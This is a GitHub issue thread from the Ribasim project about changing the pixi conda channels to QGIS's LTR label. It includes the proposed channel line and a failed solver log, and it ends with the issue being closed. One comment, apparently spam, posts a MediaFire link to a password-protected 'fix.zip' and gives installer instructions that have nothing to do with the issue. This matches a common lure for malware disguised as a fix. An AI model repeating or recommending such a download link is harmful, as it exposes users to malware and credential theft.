### ISSUE TITLE
Update QGIS in conda to use the qgis_ltr label

### ISSUE THREAD

**Issue by deltamarnix** [Deltares/Ribasim#1762]
**What**
We want the QGIS version to be installed to be the LTR versions that is published by conda-forge.

**Why**
This makes it possible to test against the lowest supported version.

**How**
We need to change the pixi channels like so:

```toml
channels = ["conda-forge/label/qgis_ltr", "conda-forge"]
```

**Additional context**
Although super easy to make this change, I made this into an issue because I got a bug when running `pixi update`.

> 
>   ⠁ py312:win-64         [00:00:03] resolving conda
>   ⠉ py312:osx-64         [00:00:03] [━━━━━━━━━━━━━━━━━━━━] 30.96 MiB @ 9.35 MiB/s downloading repodata
>   ⠉ py311:win-64         [00:00:03] resolving conda
>   ⠉ py311:osx-64         [00:00:03] loading repodata
>   ⠉ py311:osx-arm64      [00:00:03] resolving conda
>   ⠉ py311:linux-64       [00:00:03] resolving conda
>   ⠉ py312:linux-64       [00:00:03] resolving conda
>   ⠉ py310:osx-64         [00:00:03] loading repodata
>   ⠁ py310:linux-64       [00:00:03] resolving conda
>   ⠁ py310:osx-arm64      [00:00:03] resolving conda
>   ⠁ py310:win-64         [00:00:03] resolving conda                                                                       x failed to solve the conda requirements of 'py312' 'osx-arm64'
>   `-> Cannot solve the request because of: No candidates were found for build *.

See #1763 for that issue.

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by visr** [comment]
Closing, see https://github.com/Deltares/Ribasim/pull/1768#issuecomment-2317588254
